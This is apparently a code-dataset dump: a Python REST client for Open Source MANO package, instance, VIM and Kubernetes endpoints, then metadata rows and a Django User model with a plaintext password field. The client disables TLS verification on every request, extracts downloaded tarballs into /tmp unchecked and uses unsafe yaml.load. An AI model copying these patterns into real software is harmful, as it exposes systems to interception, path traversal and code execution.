requests.codes.conflict: result['data'] = "Invalid ID." return result def nsd_clone(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} # get the package onboarded tar_pkg = self.get_nsd_pkg(token, id) tarf = tarfile.open(fileobj=tar_pkg) tarf = self._descriptor_clone(tarf, 'nsd') headers['Content-File-MD5'] = self.md5( open('/tmp/' + tarf.getnames()[0] + "_clone.tar.gz", 'rb')) _url = "{0}/nsd/v1/ns_descriptors_content/".format(self._base_path) try: r = requests.post(_url, data=open('/tmp/' + tarf.getnames()[0] + "_clone.tar.gz", 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False if r.status_code == requests.codes.conflict: result['data'] = "Invalid ID." return result def vnfd_clone(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} # get the package onboarded tar_pkg = self.get_vnfd_pkg(token, id) tarf = tarfile.open(fileobj=tar_pkg) tarf = self._descriptor_clone(tarf, 'vnfd') headers['Content-File-MD5'] = self.md5( open('/tmp/' + tarf.getnames()[0] + "_clone.tar.gz", 'rb')) _url = "{0}/vnfpkgm/v1/vnf_packages_content".format(self._base_path) try: r = requests.post(_url, data=open('/tmp/' + tarf.getnames()[0] + "_clone.tar.gz", 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False if r.status_code == requests.codes.conflict: result['data'] = "Invalid ID." return result def nst_content_update(self, token, id, template): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nst/v1/netslice_templates/{1}/nst_content".format( self._base_path, id) try: r = requests.put(_url, data=template, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False return result def nsd_update(self, token, id, data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} # get the package onboarded tar_pkg = self.get_nsd_pkg(token, id) tarf = tarfile.open(fileobj=tar_pkg) tarf = self._descriptor_update(tarf, data) headers['Content-File-MD5'] = self.md5( open('/tmp/' + tarf.getnames()[0] + ".tar.gz", 'rb')) _url = "{0}/nsd/v1/ns_descriptors/{1}/nsd_content".format( self._base_path, id) try: r = requests.put(_url, data=open('/tmp/' + tarf.getnames()[0] + ".tar.gz", 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: try: result['data'] = r.json() except Exception as e: result['data'] = {} return result def vnfd_update(self, token, id, data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} # get the package onboarded tar_pkg = self.get_vnfd_pkg(token, id) tarf = tarfile.open(fileobj=tar_pkg) tarf = self._descriptor_update(tarf, data) headers['Content-File-MD5'] = self.md5( open('/tmp/' + tarf.getnames()[0] + ".tar.gz", 'rb')) _url = "{0}/vnfpkgm/v1/vnf_packages/{1}/package_content".format( self._base_path, id) try: r = requests.put(_url, data=open('/tmp/' + tarf.getnames()[0] + ".tar.gz", 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: try: result['data'] = r.json() except Exception as e: result['data'] = {} return result def get_nsd_pkg(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/zip", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsd/v1/ns_descriptors/{1}/nsd_content".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False tarf = StringIO.StringIO(r.content) return tarf return result def get_vnfd_pkg(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/zip", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/vnfpkgm/v1/vnf_packages/{1}/package_content".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False tarf = StringIO.StringIO(r.content) return tarf return result def _descriptor_update(self, tarf, data): # extract the package on a tmp directory tarf.extractall('/tmp') regex = re.compile(r"^[^/]+(/[^/]+\.(yaml|yml))$", re.U) for name in tarf.getnames(): if regex.match(name): with open('/tmp/' + name, 'w') as outfile: yaml.safe_dump(data, outfile, default_flow_style=False) break tarf_temp = tarfile.open( '/tmp/' + tarf.getnames()[0] + ".tar.gz", "w:gz") for tarinfo in tarf: tarf_temp.add('/tmp/' + tarinfo.name, tarinfo.name, recursive=False) tarf_temp.close() return tarf def _create_base_pkg(self, descriptor_type, pkg_name): filename = '/tmp/'+pkg_name+'/' + pkg_name + '.yaml' if descriptor_type == 'nsd': descriptor = { "nsd:nsd-catalog": { "nsd": [ { "short-name": str(pkg_name), "vendor": "OSM Composer", "description": str(pkg_name) + " descriptor", "vld": [], "constituent-vnfd": [], "version": "1.0", "id": str(pkg_name), "name": str(pkg_name) } ] } } elif descriptor_type == 'vnfd': descriptor = { "vnfd:vnfd-catalog": { "vnfd": [ { "short-name": str(pkg_name), "vdu": [], "description": "", "mgmt-interface": { "cp": "" }, "id": str(pkg_name), "version": "1.0", "internal-vld": [], "connection-point": [], "name": str(pkg_name) } ] } } if not os.path.exists(os.path.dirname(filename)): try: os.makedirs(os.path.dirname(filename)) except OSError as exc: # Guard against race condition if exc.errno != errno.EEXIST: raise with open('/tmp/' + pkg_name + '/' + pkg_name + '.yaml', 'w') as yaml_file: yaml_file.write(yaml.dump(descriptor, default_flow_style=False)) tarf_temp = tarfile.open('/tmp/' + pkg_name + '.tar.gz', "w:gz") tarf_temp.add('/tmp/'+pkg_name+'/' + pkg_name + '.yaml', pkg_name + '/' + pkg_name + '.yaml', recursive=False) tarf_temp.close() def _descriptor_clone(self, tarf, descriptor_type): # extract the package on a tmp directory tarf.extractall('/tmp') for name in tarf.getnames(): if name.endswith(".yaml") or name.endswith(".yml"): with open('/tmp/' + name, 'r') as outfile: yaml_object = yaml.load(outfile) if descriptor_type == 'nsd': nsd_list = yaml_object['nsd:nsd-catalog']['nsd'] for nsd in nsd_list: nsd['id'] = 'clone_' + nsd['id'] nsd['name'] = 'clone_' + nsd['name'] nsd['short-name'] = 'clone_' + nsd['short-name'] elif descriptor_type == 'vnfd': vnfd_list = yaml_object['vnfd:vnfd-catalog']['vnfd'] for vnfd in vnfd_list: vnfd['id'] = 'clone_' + vnfd['id'] vnfd['name'] = 'clone_' + vnfd['name'] vnfd['short-name'] = 'clone_' + vnfd['short-name'] with open('/tmp/' + name, 'w') as yaml_file: yaml_file.write( yaml.dump(yaml_object, default_flow_style=False)) break tarf_temp = tarfile.open( '/tmp/' + tarf.getnames()[0] + "_clone.tar.gz", "w:gz") for tarinfo in tarf: tarf_temp.add('/tmp/' + tarinfo.name, tarinfo.name, recursive=False) tarf_temp.close() return tarf def nsd_get(self, token, id): result = {'error': True, 'data': ''} headers = {'Content-Type': 'application/yaml', 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsd/v1/ns_descriptors/{1}/nsd".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False return yaml.load(r.text) else: try: result['data'] = r.json() except Exception as e: result['data'] = {} return result def vnfd_get(self, token, id): result = {'error': True, 'data': ''} headers = {'Content-Type': 'application/yaml', 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/vnfpkgm/v1/vnf_packages/{1}/vnfd".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False return yaml.load(r.text) else: try: result['data'] = r.json() except Exception as e: result['data'] = {} return result def nsd_artifacts(self, token, id): result = {'error': True, 'data': ''} headers = {'Content-Type': 'application/yaml', 'accept': 'text/plain', 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsd/v1/ns_descriptors/{1}/artifacts".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = r.text else: try: result['data'] = r.json() except Exception as e: result['data'] = {} return result def vnf_packages_artifacts(self, token, id): result = {'error': True, 'data': ''} headers = {'Content-Type': 'application/yaml', 'accept': 'text/plain', 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/vnfpkgm/v1/vnf_packages/{1}/artifacts".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = r.text else: try: result['data'] = r.json() except Exception as e: result['data'] = {} return result def nsi_create(self, token, nsi_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsilcm/v1/netslice_instances_content".format( self._base_path) try: r = requests.post(_url, json=nsi_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_create(self, token, ns_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/ns_instances_content".format(self._base_path) try: r = requests.post(_url, json=ns_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def pdu_create(self, token, pdu_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/pdu/v1/pdu_descriptors".format(self._base_path) try: r = requests.post(_url, json=pdu_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_op_list(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/ns_lcm_op_occs/?nsInstanceId={1}".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nsi_op_list(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsilcm/v1/nsi_lcm_op_occs/?netsliceInstanceId={1}".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_op(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/ns_lcm_op_occs/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_action(self, token, id, action_payload): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/ns_instances/{1}/action".format( self._base_path, id) try: r = requests.post(_url, json=action_payload, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nsi_delete(self, token, id, force=None): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} query_path = '' if force: query_path = '?FORCE=true' _url = "{0}/nsilcm/v1/netslice_instances_content/{1}{2}".format( self._base_path, id, query_path) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r: result['error'] = False if r.status_code != requests.codes.no_content: result['data'] = Util.json_loads_byteified(r.text) return result def ns_delete(self, token, id, force=None): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} query_path = '' if force: query_path = '?FORCE=true' _url = "{0}/nslcm/v1/ns_instances_content/{1}{2}".format( self._base_path, id, query_path) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r: result['error'] = False if r.status_code != requests.codes.no_content: result['data'] = Util.json_loads_byteified(r.text) return result def pdu_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/pdu/v1/pdu_descriptors/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r: result['error'] = False if r.status_code != requests.codes.no_content: result['data'] = Util.json_loads_byteified(r.text) return result def nsi_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsilcm/v1/netslice_instances/{1}".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/ns_instances_content/{1}".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vnf_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/vnfrs/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def pdu_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/pdu/v1/pdu_descriptors/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_alarm_create(self, token, id, alarm_payload): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/test/message/alarm_request".format(self._base_path) try: r = requests.post(_url, json=alarm_payload, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False # result['data'] = Util.json_loads_byteified(r.text) result['data'] = r.text return result def ns_metric_export(self, token, id, metric_payload): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/test/message/metric_request".format(self._base_path) try: r = requests.post(_url, json=metric_payload, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False # result['data'] = Util.json_loads_byteified(r.text) result['data'] = r.text return result def wim_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/wim_accounts".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vim_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/vims".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def wim_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/wim_accounts/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = r.text return result def vim_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/vims/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = r.text return result def wim_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/wim_accounts/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vim_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/vims/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def wim_create(self, token, wim_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/wim_accounts".format(self._base_path) try: r = requests.post(_url, json=wim_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vim_create(self, token, vim_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/vims".format(self._base_path) try: r = requests.post(_url, json=vim_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def sdn_list(self, token): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/sdns".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def sdn_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/sdns/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = r.text return result def sdn_get(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/sdns/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def sdn_create(self, token, sdn_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/sdns".format(self._base_path) try: r = requests.post(_url, json=sdn_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def k8sc_get(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/k8sclusters/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def k8sc_list(self, token): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/k8sclusters".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def k8sc_create(self, token, cluster_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/k8sclusters".format(self._base_path) try: r = requests.post(_url, json=cluster_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def k8sc_update(self, token, id, cluster_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/k8sclusters/{1}".format(self._base_path, id) try: r = requests.patch(_url, json=cluster_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def k8sc_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/k8sclusters/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def k8sr_get(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/k8srepos/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def k8sr_list(self, token): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/k8srepos".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def k8sr_create(self, token, cluster_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/k8srepos".format(self._base_path) try: r = requests.post(_url, json=cluster_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def k8sr_update(self, token, id, cluster_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/k8srepos/{1}".format(self._base_path, id) try: r = requests.patch(_url, json=cluster_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def k8sr_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/k8srepos/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def osmr_get(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/osmrepos/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def osmr_list(self, token): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/osmrepos".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def osmr_create(self, token, cluster_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/osmrepos".format(self._base_path) try: r = requests.post(_url, json=cluster_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def osmr_update(self, token, id, cluster_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/osmrepos/{1}".format(self._base_path, id) try: r = requests.patch(_url, json=cluster_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def osmr_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/osmrepos/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result @staticmethod def md5(f): hash_md5 = hashlib.md5() for chunk in iter(lambda: f.read(1024), b""): hash_md5.update(chunk) return hash_md5.hexdigest()
39.067079
114
0.52215
8,318
75,712
4.636211
0.037148
0.048491
0.042319
0.044809
0.925604
0.918032
0.911213
0.909242
0.906934
0.904859
0
0.026349
0.334306
75,712
1,937
115
39.087248
0.738795
0.011517
0
0.851327
0
0
0.157954
0.032441
0
0
0
0
0
1
0.056047
false
0
0.00649
0
0.173451
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
7ba97e75c8387e583f023e9f936c7a01b8b64387
179
py
Python
product_hunt/account/models.py
xeroCBW/product_hunt
ef0f358609ed4c4063c037b2b0bb778b18e83bb8
[ "MIT" ]
null
null
null
product_hunt/account/models.py
xeroCBW/product_hunt
ef0f358609ed4c4063c037b2b0bb778b18e83bb8
[ "MIT" ]
null
null
null
product_hunt/account/models.py
xeroCBW/product_hunt
ef0f358609ed4c4063c037b2b0bb778b18e83bb8
[ "MIT" ]
null
null
null
from django.db import models # Create your models here. class User(models.Model): username = models.CharField(max_length=100) passwoed = models.CharField(max_length=100)
25.571429
47
0.759777
25
179
5.36
0.68
0.223881
0.268657
0.358209
0.402985
0
0
0
0
0
0
0.039216
0.145251
179
7
48
25.571429
0.836601
0.134078
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0.25
0.25
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
7
7bcafca62fcf3c3c4e5a84f7c7013bcf6b586343
216
py
Python
csr/snake_case.py
AlexJanse/python_csr2transmart
